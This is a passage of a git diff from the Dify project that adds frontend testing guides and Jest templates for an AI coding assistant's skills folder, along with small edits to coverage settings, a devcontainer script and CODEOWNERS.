+ ), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + mockPortalOpenState = false // ✅ Reset shared state + }) +}) +``` + +### 4. API Service Mocks + +```typescript +import * as api from '@/service/api' + +jest.mock('@/service/api') + +const mockedApi = api as jest.Mocked + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + + // Setup default mock implementation + mockedApi.fetchData.mockResolvedValue({ data: [] }) + }) + + it('should show data on success', async () => { + mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] }) + + render() + + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + }) + }) + + it('should show error on failure', async () => { + mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 5. HTTP Mocking with Nock + +```typescript +import nock from 'nock' + +const GITHUB_HOST = 'https://api.github.com' +const GITHUB_PATH = '/repos/owner/repo' + +const mockGithubApi = (status: number, body: Record, delayMs = 0) => { + return nock(GITHUB_HOST) + .get(GITHUB_PATH) + .delay(delayMs) + .reply(status, body) +} + +describe('GithubComponent', () => { + afterEach(() => { + nock.cleanAll() + }) + + it('should display repo info', async () => { + mockGithubApi(200, { name: 'dify', stars: 1000 }) + + render() + + await waitFor(() => { + expect(screen.getByText('dify')).toBeInTheDocument() + }) + }) + + it('should handle API error', async () => { + mockGithubApi(500, { message: 'Server error' }) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 6. Context Providers + +```typescript +import { ProviderContext } from '@/context/provider-context' +import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context' + +describe('Component with Context', () => { + it('should render for free plan', () => { + const mockContext = createMockPlan('sandbox') + + render( + + + + ) + + expect(screen.getByText('Upgrade')).toBeInTheDocument() + }) + + it('should render for pro plan', () => { + const mockContext = createMockPlan('professional') + + render( + + + + ) + + expect(screen.queryByText('Upgrade')).not.toBeInTheDocument() + }) +}) +``` + +### 7. SWR / React Query + +```typescript +// SWR +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +import useSWR from 'swr' +const mockedUseSWR = useSWR as jest.Mock + +describe('Component with SWR', () => { + it('should show loading state', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + error: undefined, + isLoading: true, + }) + + render() + expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) +}) + +// React Query +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' + +const createTestQueryClient = () => new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, +}) + +const renderWithQueryClient = (ui: React.ReactElement) => { + const queryClient = createTestQueryClient() + return render( + + {ui} + + ) +} +``` + +## Mock Best Practices + +### ✅ DO + +1. **Use real base components** - Import from `@/app/components/base/` directly +1. **Use real project components** - Prefer importing over mocking +1. **Reset mocks in `beforeEach`**, not `afterEach` +1. **Match actual component behavior** in mocks (when mocking is necessary) +1. **Use factory functions** for complex mock data +1. **Import actual types** for type safety +1. **Reset shared mock state** in `beforeEach` + +### ❌ DON'T + +1. **Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +1. Don't mock components you can import directly +1. Don't create overly simplified mocks that miss conditional logic +1. Don't forget to clean up nock after each test +1. Don't use `any` types in mocks without necessity + +### Mock Decision Tree + +``` +Need to use a component in test? +│ +├─ Is it from @/app/components/base/*? +│ └─ YES → Import real component, DO NOT mock +│ +├─ Is it a project component? +│ └─ YES → Prefer importing real component +│ Only mock if setup is extremely complex +│ +├─ Is it an API service (@/service/*)? +│ └─ YES → Mock it +│ +├─ Is it a third-party lib with side effects? +│ └─ YES → Mock it (next/navigation, external SDKs) +│ +└─ Is it i18n? + └─ YES → Uses shared mock (auto-loaded). Override only for custom translations +``` + +## Factory Function Pattern + +```typescript +// __mocks__/data-factories.ts +import type { User, Project } from '@/types' + +export const createMockUser = (overrides: Partial = {}): User => ({ + id: 'user-1', + name: 'Test User', + email: 'test@example.com', + role: 'member', + createdAt: new Date().toISOString(), + ...overrides, +}) + +export const createMockProject = (overrides: Partial = {}): Project => ({ + id: 'project-1', + name: 'Test Project', + description: 'A test project', + owner: createMockUser(), + members: [], + createdAt: new Date().toISOString(), + ...overrides, +}) + +// Usage in tests +it('should display project owner', () => { + const project = createMockProject({ + owner: createMockUser({ name: 'John Doe' }), + }) + + render() + expect(screen.getByText('John Doe')).toBeInTheDocument() +}) +``` diff --git a/.claude/skills/frontend-testing/guides/workflow.md b/.claude/skills/frontend-testing/guides/workflow.md new file mode 100644 index 0000000000..b0f2994bde --- /dev/null +++ b/.claude/skills/frontend-testing/guides/workflow.md @@ -0,0 +1,269 @@ +# Testing Workflow Guide + +This guide defines the workflow for generating tests, especially for complex components or directories with multiple files. + +## Scope Clarification + +This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals. + +| Scope | Rule | +|-------|------| +| **Single file** | Complete coverage in one generation (100% function, >95% branch) | +| **Multi-file directory** | Process one file at a time, verify each before proceeding | + +## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing + +When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach. + +### Why Incremental? + +| Batch Approach (❌) | Incremental Approach (✅) | +|---------------------|---------------------------| +| Generate 5+ tests at once | Generate 1 test at a time | +| Run tests only at the end | Run test immediately after each file | +| Multiple failures compound | Single point of failure, easy to debug | +| Hard to identify root cause | Clear cause-effect relationship | +| Mock issues affect many files | Mock issues caught early | +| Messy git history | Clean, atomic commits possible | + +## Single File Workflow + +When testing a **single component, hook, or utility**: + +``` +1. Read source code completely +2. Run `pnpm analyze-component ` (if available) +3. Check complexity score and features detected +4. Write the test file +5. Run test: `pnpm test -- .spec.tsx` +6. Fix any failures +7. Verify coverage meets goals (100% function, >95% branch) +``` + +## Directory/Multi-File Workflow (MUST FOLLOW) + +When testing a **directory or multiple files**, follow this strict workflow: + +### Step 1: Analyze and Plan + +1. **List all files** that need tests in the directory +1. **Categorize by complexity**: + - 🟢 **Simple**: Utility functions, simple hooks, presentational components + - 🟡 **Medium**: Components with state, effects, or event handlers + - 🔴 **Complex**: Components with API calls, routing, or many dependencies +1. **Order by dependency**: Test dependencies before dependents +1. **Create a todo list** to track progress + +### Step 2: Determine Processing Order + +Process files in this recommended order: + +``` +1. Utility functions (simplest, no React) +2. Custom hooks (isolated logic) +3. Simple presentational components (few/no props) +4. Medium complexity components (state, effects) +5. Complex components (API, routing, many deps) +6. Container/index components (integration tests - last) +``` + +**Rationale**: + +- Simpler files help establish mock patterns +- Hooks used by components should be tested first +- Integration tests (index files) depend on child components working + +### Step 3: Process Each File Incrementally + +**For EACH file in the ordered list:** + +``` +┌─────────────────────────────────────────────┐ +│ 1. Write test file │ +│ 2. Run: pnpm test -- .spec.tsx │ +│ 3. If FAIL → Fix immediately, re-run │ +│ 4. If PASS → Mark complete in todo list │ +│ 5. ONLY THEN proceed to next file │ +└─────────────────────────────────────────────┘ +``` + +**DO NOT proceed to the next file until the current one passes.** + +### Step 4: Final Verification + +After all individual tests pass: + +```bash +# Run all tests in the directory together +pnpm test -- path/to/directory/ + +# Check coverage +pnpm test -- --coverage path/to/directory/ +``` + +## Component Complexity Guidelines + +Use `pnpm analyze-component ` to assess complexity before testing. + +### 🔴 Very Complex Components (Complexity > 50) + +**Consider refactoring BEFORE testing:** + +- Break component into smaller, testable pieces +- Extract complex logic into custom hooks +- Separate container and presentational layers + +**If testing as-is:** + +- Use integration tests for complex workflows +- Use `test.each()` for data-driven testing +- Multiple `describe` blocks for organization +- Consider testing major sections separately + +### 🟡 Medium Complexity (Complexity 30-50) + +- Group related tests in `describe` blocks +- Test integration scenarios between internal parts +- Focus on state transitions and side effects +- Use helper functions to reduce test complexity + +### 🟢 Simple Components (Complexity < 30) + +- Standard test structure +- Focus on props, rendering, and edge cases +- Usually straightforward to test + +### 📏 Large Files (500+ lines) + +Regardless of complexity score: + +- **Strongly consider refactoring** before testing +- If testing as-is, test major sections separately +- Create helper functions for test setup +- May need multiple test files + +## Todo List Format + +When testing multiple files, use a todo list like this: + +``` +Testing: path/to/directory/ + +Ordered by complexity (simple → complex): + +☐ utils/helper.ts [utility, simple] +☐ hooks/use-custom-hook.ts [hook, simple] +☐ empty-state.tsx [component, simple] +☐ item-card.tsx [component, medium] +☐ list.tsx [component, complex] +☐ index.tsx [integration] + +Progress: 0/6 complete +``` + +Update status as you complete each: + +- ☐ → ⏳ (in progress) +- ⏳ → ✅ (complete and verified) +- ⏳ → ❌ (blocked, needs attention) + +## When to Stop and Verify + +**Always run tests after:** + +- Completing a test file +- Making changes to fix a failure +- Modifying shared mocks +- Updating test utilities or helpers + +**Signs you should pause:** + +- More than 2 consecutive test failures +- Mock-related errors appearing +- Unclear why a test is failing +- Test passing but coverage unexpectedly low + +## Common Pitfalls to Avoid + +### ❌ Don't: Generate Everything First + +``` +# BAD: Writing all files then testing +Write component-a.spec.tsx +Write component-b.spec.tsx +Write component-c.spec.tsx +Write component-d.spec.tsx +Run pnpm test ← Multiple failures, hard to debug +``` + +### ✅ Do: Verify Each Step + +``` +# GOOD: Incremental with verification +Write component-a.spec.tsx +Run pnpm test -- component-a.spec.tsx ✅ +Write component-b.spec.tsx +Run pnpm test -- component-b.spec.tsx ✅ +...continue... +``` + +### ❌ Don't: Skip Verification for "Simple" Components + +Even simple components can have: + +- Import errors +- Missing mock setup +- Incorrect assumptions about props + +**Always verify, regardless of perceived simplicity.** + +### ❌ Don't: Continue When Tests Fail + +Failing tests compound: + +- A mock issue in file A affects files B, C, D +- Fixing A later requires revisiting all dependent tests +- Time wasted on debugging cascading failures + +**Fix failures immediately before proceeding.** + +## Integration with Claude's Todo Feature + +When using Claude for multi-file testing: + +1. **Ask Claude to create a todo list** before starting +1. **Request one file at a time** or ensure Claude processes incrementally +1. **Verify each test passes** before asking for the next +1. **Mark todos complete** as you progress + +Example prompt: + +``` +Test all components in `path/to/directory/`. +First, analyze the directory and create a todo list ordered by complexity. +Then, process ONE file at a time, waiting for my confirmation that tests pass +before proceeding to the next. +``` + +## Summary Checklist + +Before starting multi-file testing: + +- [ ] Listed all files needing tests +- [ ] Ordered by complexity (simple → complex) +- [ ] Created todo list for tracking +- [ ] Understand dependencies between files + +During testing: + +- [ ] Processing ONE file at a time +- [ ] Running tests after EACH file +- [ ] Fixing failures BEFORE proceeding +- [ ] Updating todo list progress + +After completion: + +- [ ] All individual tests pass +- [ ] Full directory test run passes +- [ ] Coverage goals met +- [ ] Todo list shows all complete diff --git a/.claude/skills/frontend-testing/templates/component-test.template.tsx b/.claude/skills/frontend-testing/templates/component-test.template.tsx new file mode 100644 index 0000000000..f1ea71a3fd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/component-test.template.tsx @@ -0,0 +1,296 @@ +/** + * Test Template for React Components + * + * WHY THIS STRUCTURE? + * - Organized sections make tests easy to navigate and maintain + * - Mocks at top ensure consistent test isolation + * - Factory functions reduce duplication and improve readability + * - describe blocks group related scenarios for better debugging + * + * INSTRUCTIONS: + * 1. Replace `ComponentName` with your component name + * 2. Update import path + * 3. Add/remove test sections based on component features (use analyze-component) + * 4. Follow AAA pattern: Arrange → Act → Assert + * + * RUN FIRST: pnpm analyze-component to identify required test scenarios + */ + +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +// import ComponentName from './index' + +// ============================================================================ +// Mocks +// ============================================================================ +// WHY: Mocks must be hoisted to top of file (Jest requirement). +// They run BEFORE imports, so keep them before component imports. + +// i18n (automatically mocked) +// WHY: Shared mock at web/__mocks__/react-i18next.ts is auto-loaded by Jest +// No explicit mock needed - it returns translation keys as-is +// Override only if custom translations are required: +// jest.mock('react-i18next', () => ({ +// useTranslation: () => ({ +// t: (key: string) => { +// const customTranslations: Record = { +// 'my.custom.key': 'Custom Translation', +// } +// return customTranslations[key] || key +// }, +// }), +// })) + +// Router (if component uses useRouter, usePathname, useSearchParams) +// WHY: Isolates tests from Next.js routing, enables testing navigation behavior +// const mockPush = jest.fn() +// jest.mock('next/navigation', () => ({ +// useRouter: () => ({ push: mockPush }), +// usePathname: () => '/test-path', +// })) + +// API services (if component fetches data) +// WHY: Prevents real network calls, enables testing all states (loading/success/error) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// Shared mock state (for portal/dropdown components) +// WHY: Portal components like PortalToFollowElem need shared state between +// parent and child mocks to correctly simulate open/close behavior +// let mockOpenState = false + +// ============================================================================ +// Test Data Factories +// ============================================================================ +// WHY FACTORIES? +// - Avoid hard-coded test data scattered across tests +// - Easy to create variations with overrides +// - Type-safe when using actual types from source +// - Single source of truth for default test values + +// const createMockProps = (overrides = {}) => ({ +// // Default props that make component render successfully +// ...overrides, +// }) + +// const createMockItem = (overrides = {}) => ({ +// id: 'item-1', +// name: 'Test Item', +// ...overrides, +// }) + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// const renderComponent = (props = {}) => { +// return render() +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('ComponentName', () => { + // WHY beforeEach with clearAllMocks? + // - Ensures each test starts with clean slate + // - Prevents mock call history from leaking between tests + // - MUST be beforeEach (not afterEach) to reset BEFORE assertions like toHaveBeenCalledTimes + beforeEach(() => { + jest.clearAllMocks() + // Reset shared mock state if used (CRITICAL for portal/dropdown tests) + // mockOpenState = false + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED - Every component MUST have these) + // -------------------------------------------------------------------------- + // WHY: Catches import errors, missing providers, and basic render issues + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange - Setup data and mocks + // const props = createMockProps() + + // Act - Render the component + // render() + + // Assert - Verify expected output + // Prefer getByRole for accessibility; it's what users "see" + // expect(screen.getByRole('...')).toBeInTheDocument() + }) + + it('should render with default props', () => { + // WHY: Verifies component works without optional props + // render() + // expect(screen.getByText('...')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED - Every component MUST test prop behavior) + // -------------------------------------------------------------------------- + // WHY: Props are the component's API contract. Test them thoroughly. + describe('Props', () => { + it('should apply custom className', () => { + // WHY: Common pattern in Dify - components should merge custom classes + // render() + // expect(screen.getByTestId('component')).toHaveClass('custom-class') + }) + + it('should use default values for optional props', () => { + // WHY: Verifies TypeScript defaults work at runtime + // render() + // expect(screen.getByRole('...')).toHaveAttribute('...', 'default-value') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions (if component has event handlers - on*, handle*) + // -------------------------------------------------------------------------- + // WHY: Event handlers are core functionality. Test from user's perspective. + describe('User Interactions', () => { + it('should call onClick when clicked', async () => { + // WHY userEvent over fireEvent? + // - userEvent simulates real user behavior (focus, hover, then click) + // - fireEvent is lower-level, doesn't trigger all browser events + // const user = userEvent.setup() + // const handleClick = jest.fn() + // render() + // + // await user.click(screen.getByRole('button')) + // + // expect(handleClick).toHaveBeenCalledTimes(1) + }) + + it('should call onChange when value changes', async () => { + // const user = userEvent.setup() + // const handleChange = jest.fn() + // render() + // + // await user.type(screen.getByRole('textbox'), 'new value') + // + // expect(handleChange).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // State Management (if component uses useState/useReducer) + // -------------------------------------------------------------------------- + // WHY: Test state through observable UI changes, not internal state values + describe('State Management', () => { + it('should update state on interaction', async () => { + // WHY test via UI, not state? + // - State is implementation detail; UI is what users see + // - If UI works correctly, state must be correct + // const user = userEvent.setup() + // render() + // + // // Initial state - verify what user sees + // expect(screen.getByText('Initial')).toBeInTheDocument() + // + // // Trigger state change via user action + // await user.click(screen.getByRole('button')) + // + // // New state - verify UI updated + // expect(screen.getByText('Updated')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations (if component fetches data - useSWR, useQuery, fetch) + // -------------------------------------------------------------------------- + // WHY: Async operations have 3 states users experience: loading, success, error + describe('Async Operations', () => { + it('should show loading state', () => { + // WHY never-resolving promise? + // - Keeps component in loading state for assertion + // - Alternative: use fake timers + // mockedApi.fetchData.mockImplementation(() => new Promise(() => {})) + // render() + // + // expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) + + it('should show data on success', async () => { + // WHY waitFor? + // - Component updates asynchronously after fetch resolves + // - waitFor retries assertion until it passes or times out + // mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] }) + // render() + // + // await waitFor(() => { + // expect(screen.getByText('Item 1')).toBeInTheDocument() + // }) + }) + + it('should show error on failure', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // render() + // + // await waitFor(() => { + // expect(screen.getByText(/error/i)).toBeInTheDocument() + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED - Every component MUST handle edge cases) + // -------------------------------------------------------------------------- + // WHY: Real-world data is messy. Components must handle: + // - Null/undefined from API failures or optional fields + // - Empty arrays/strings from user clearing data + // - Boundary values (0, MAX_INT, special characters) + describe('Edge Cases', () => { + it('should handle null value', () => { + // WHY test null specifically? + // - API might return null for missing data + // - Prevents "Cannot read property of null" in production + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle undefined value', () => { + // WHY test undefined separately from null? + // - TypeScript treats them differently + // - Optional props are undefined, not null + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + // WHY: Empty state often needs special UI (e.g., "No items yet") + // render() + // expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + + it('should handle empty string', () => { + // WHY: Empty strings are truthy in JS but visually empty + // render() + // expect(screen.getByText(/placeholder/i)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Accessibility (optional but recommended for Dify's enterprise users) + // -------------------------------------------------------------------------- + // WHY: Dify has enterprise customers who may require accessibility compliance + describe('Accessibility', () => { + it('should have accessible name', () => { + // WHY getByRole with name? + // - Tests that screen readers can identify the element + // - Enforces proper labeling practices + // render() + // expect(screen.getByRole('button', { name: /test label/i })).toBeInTheDocument() + }) + + it('should support keyboard navigation', async () => { + // WHY: Some users can't use a mouse + // const user = userEvent.setup() + // render() + // + // await user.tab() + // expect(screen.getByRole('button')).toHaveFocus() + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/hook-test.template.ts b/.claude/skills/frontend-testing/templates/hook-test.template.ts new file mode 100644 index 0000000000..4fb7fd21ec --- /dev/null +++ b/.claude/skills/frontend-testing/templates/hook-test.template.ts @@ -0,0 +1,207 @@ +/** + * Test Template for Custom Hooks + * + * Instructions: + * 1. Replace `useHookName` with your hook name + * 2. Update import path + * 3. Add/remove test sections based on hook features + */ + +import { renderHook, act, waitFor } from '@testing-library/react' +// import { useHookName } from './use-hook-name' + +// ============================================================================ +// Mocks +// ============================================================================ + +// API services (if hook fetches data) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// Wrapper for hooks that need context +// const createWrapper = (contextValue = {}) => { +// return ({ children }: { children: React.ReactNode }) => ( +// +// {children} +// +// ) +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('useHookName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Initial State + // -------------------------------------------------------------------------- + describe('Initial State', () => { + it('should return initial state', () => { + // const { result } = renderHook(() => useHookName()) + // + // expect(result.current.value).toBe(initialValue) + // expect(result.current.isLoading).toBe(false) + }) + + it('should accept initial value from props', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'custom' })) + // + // expect(result.current.value).toBe('custom') + }) + }) + + // -------------------------------------------------------------------------- + // State Updates + // -------------------------------------------------------------------------- + describe('State Updates', () => { + it('should update value when setValue is called', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(result.current.value).toBe('new value') + }) + + it('should reset to initial value', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'initial' })) + // + // act(() => { + // result.current.setValue('changed') + // }) + // expect(result.current.value).toBe('changed') + // + // act(() => { + // result.current.reset() + // }) + // expect(result.current.value).toBe('initial') + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations + // -------------------------------------------------------------------------- + describe('Async Operations', () => { + it('should fetch data on mount', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result } = renderHook(() => useHookName()) + // + // // Initially loading + // expect(result.current.isLoading).toBe(true) + // + // // Wait for data + // await waitFor(() => { + // expect(result.current.isLoading).toBe(false) + // }) + // + // expect(result.current.data).toEqual({ data: 'test' }) + }) + + it('should handle fetch error', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // + // const { result } = renderHook(() => useHookName()) + // + // await waitFor(() => { + // expect(result.current.error).toBeTruthy() + // }) + // + // expect(result.current.error?.message).toBe('Network error') + }) + + it('should refetch when dependency changes', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result, rerender } = renderHook( + // ({ id }) => useHookName(id), + // { initialProps: { id: '1' } } + // ) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('1') + // }) + // + // rerender({ id: '2' }) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('2') + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Side Effects + // -------------------------------------------------------------------------- + describe('Side Effects', () => { + it('should call callback when value changes', () => { + // const callback = jest.fn() + // const { result } = renderHook(() => useHookName({ onChange: callback })) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(callback).toHaveBeenCalledWith('new value') + }) + + it('should cleanup on unmount', () => { + // const cleanup = jest.fn() + // jest.spyOn(window, 'addEventListener') + // jest.spyOn(window, 'removeEventListener') + // + // const { unmount } = renderHook(() => useHookName()) + // + // expect(window.addEventListener).toHaveBeenCalled() + // + // unmount() + // + // expect(window.removeEventListener).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle null input', () => { + // const { result } = renderHook(() => useHookName(null)) + // + // expect(result.current.value).toBeNull() + }) + + it('should handle rapid updates', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('1') + // result.current.setValue('2') + // result.current.setValue('3') + // }) + // + // expect(result.current.value).toBe('3') + }) + }) + + // -------------------------------------------------------------------------- + // With Context (if hook uses context) + // -------------------------------------------------------------------------- + describe('With Context', () => { + it('should use context value', () => { + // const wrapper = createWrapper({ someValue: 'context-value' }) + // const { result } = renderHook(() => useHookName(), { wrapper }) + // + // expect(result.current.contextValue).toBe('context-value') + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/utility-test.template.ts b/.claude/skills/frontend-testing/templates/utility-test.template.ts new file mode 100644 index 0000000000..ec13b5f5bd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/utility-test.template.ts @@ -0,0 +1,154 @@ +/** + * Test Template for Utility Functions + * + * Instructions: + * 1. Replace `utilityFunction` with your function name + * 2. Update import path + * 3. Use test.each for data-driven tests + */ + +// import { utilityFunction } from './utility' + +// ============================================================================ +// Tests +// ============================================================================ + +describe('utilityFunction', () => { + // -------------------------------------------------------------------------- + // Basic Functionality + // -------------------------------------------------------------------------- + describe('Basic Functionality', () => { + it('should return expected result for valid input', () => { + // expect(utilityFunction('input')).toBe('expected-output') + }) + + it('should handle multiple arguments', () => { + // expect(utilityFunction('a', 'b', 'c')).toBe('abc') + }) + }) + + // -------------------------------------------------------------------------- + // Data-Driven Tests + // -------------------------------------------------------------------------- + describe('Input/Output Mapping', () => { + test.each([ + // [input, expected] + ['input1', 'output1'], + ['input2', 'output2'], + ['input3', 'output3'], + ])('should return %s for input %s', (input, expected) => { + // expect(utilityFunction(input)).toBe(expected) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty string', () => { + // expect(utilityFunction('')).toBe('') + }) + + it('should handle null', () => { + // expect(utilityFunction(null)).toBe(null) + // or + // expect(() => utilityFunction(null)).toThrow() + }) + + it('should handle undefined', () => { + // expect(utilityFunction(undefined)).toBe(undefined) + // or + // expect(() => utilityFunction(undefined)).toThrow() + }) + + it('should handle empty array', () => { + // expect(utilityFunction([])).toEqual([]) + }) + + it('should handle empty object', () => { + // expect(utilityFunction({})).toEqual({}) + }) + }) + + // -------------------------------------------------------------------------- + // Boundary Conditions + // -------------------------------------------------------------------------- + describe('Boundary Conditions', () => { + it('should handle minimum value', () => { + // expect(utilityFunction(0)).toBe(0) + }) + + it('should handle maximum value', () => { + // expect(utilityFunction(Number.MAX_SAFE_INTEGER)).toBe(...) + }) + + it('should handle negative numbers', () => { + // expect(utilityFunction(-1)).toBe(...) + }) + }) + + // -------------------------------------------------------------------------- + // Type Coercion (if applicable) + // -------------------------------------------------------------------------- + describe('Type Handling', () => { + it('should handle numeric string', () => { + // expect(utilityFunction('123')).toBe(123) + }) + + it('should handle boolean', () => { + // expect(utilityFunction(true)).toBe(...) + }) + }) + + // -------------------------------------------------------------------------- + // Error Cases + // -------------------------------------------------------------------------- + describe('Error Handling', () => { + it('should throw for invalid input', () => { + // expect(() => utilityFunction('invalid')).toThrow('Error message') + }) + + it('should throw with specific error type', () => { + // expect(() => utilityFunction('invalid')).toThrow(ValidationError) + }) + }) + + // -------------------------------------------------------------------------- + // Complex Objects (if applicable) + // -------------------------------------------------------------------------- + describe('Object Handling', () => { + it('should preserve object structure', () => { + // const input = { a: 1, b: 2 } + // expect(utilityFunction(input)).toEqual({ a: 1, b: 2 }) + }) + + it('should handle nested objects', () => { + // const input = { nested: { deep: 'value' } } + // expect(utilityFunction(input)).toEqual({ nested: { deep: 'transformed' } }) + }) + + it('should not mutate input', () => { + // const input = { a: 1 } + // const inputCopy = { ...input } + // utilityFunction(input) + // expect(input).toEqual(inputCopy) + }) + }) + + // -------------------------------------------------------------------------- + // Array Handling (if applicable) + // -------------------------------------------------------------------------- + describe('Array Handling', () => { + it('should process all elements', () => { + // expect(utilityFunction([1, 2, 3])).toEqual([2, 4, 6]) + }) + + it('should handle single element array', () => { + // expect(utilityFunction([1])).toEqual([2]) + }) + + it('should preserve order', () => { + // expect(utilityFunction(['c', 'a', 'b'])).toEqual(['c', 'a', 'b']) + }) + }) +}) diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000000..190c0c185b --- /dev/null +++ b/.coveragerc @@ -0,0 +1,5 @@ +[run] +omit = + api/tests/* + api/migrations/* + api/core/rag/datasource/vdb/* diff --git a/.devcontainer/post_create_command.sh b/.devcontainer/post_create_command.sh index a26fd076ed..ce9135476f 100755 --- a/.devcontainer/post_create_command.sh +++ b/.devcontainer/post_create_command.sh @@ -6,7 +6,7 @@ cd web && pnpm install pipx install uv echo "alias start-api=\"cd $WORKSPACE_ROOT/api && uv run python -m flask run --host 0.0.0.0 --port=5001 --debug\"" >> ~/.bashrc -echo "alias start-worker=\"cd $WORKSPACE_ROOT/api && uv run python -m celery -A app.celery worker -P threads -c 1 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor\"" >> ~/.bashrc +echo "alias start-worker=\"cd $WORKSPACE_ROOT/api && uv run python -m celery -A app.celery worker -P threads -c 1 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention\"" >> ~/.bashrc echo "alias start-web=\"cd $WORKSPACE_ROOT/web && pnpm dev\"" >> ~/.bashrc echo "alias start-web-prod=\"cd $WORKSPACE_ROOT/web && pnpm build && pnpm start\"" >> ~/.bashrc echo "alias start-containers=\"cd $WORKSPACE_ROOT/docker && docker-compose -f docker-compose.middleware.yaml -p dify --env-file middleware.env up -d\"" >> ~/.bashrc diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index d6f326d4dc..06a60308c2 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -6,6 +6,12 @@ * @crazywoola @laipz8200 @Yeuoly +# CODEOWNERS file +.github/CODEOWNERS @laipz8200 @crazywoola + +# Docs +docs/ @crazywoola + # Backend (default owner, more specific rules below will override) api/ @QuantumGhost @@ -116,7 +122,7 @@ api/controllers/console/feature.py @GarfieldDai @GareArc api/controllers/web/feature.py @GarfieldDai @GareArc # Backend - Database Migrations -api/migrations/ @snakevash @laipz8200 +api/migrations/ @snakevash @laipz8200 @MRZHUH # Frontend web/ @iamjoel diff --git a/.github/copilot-instructions.md b/.github/copilot-instructions.md deleted file mode 100644 index 53afcbda1e..0000000000 --- a/.github/copilot-instructions.md +++ /dev/null @@ -1,12 +0,0 @@ -# Copilot Instructions - -GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`. - -Key reminders: - -- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks). -- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable. -- Target >95% line and branch coverage and 100% function/statement coverage. -- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities. - -Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance. diff --git a/.github/workflows/api-tests.yml b/.github/workflows/api-tests.yml index 557d747a8c..76cbf64fca 100644 --- a/.github/workflows/api-tests.yml +++ 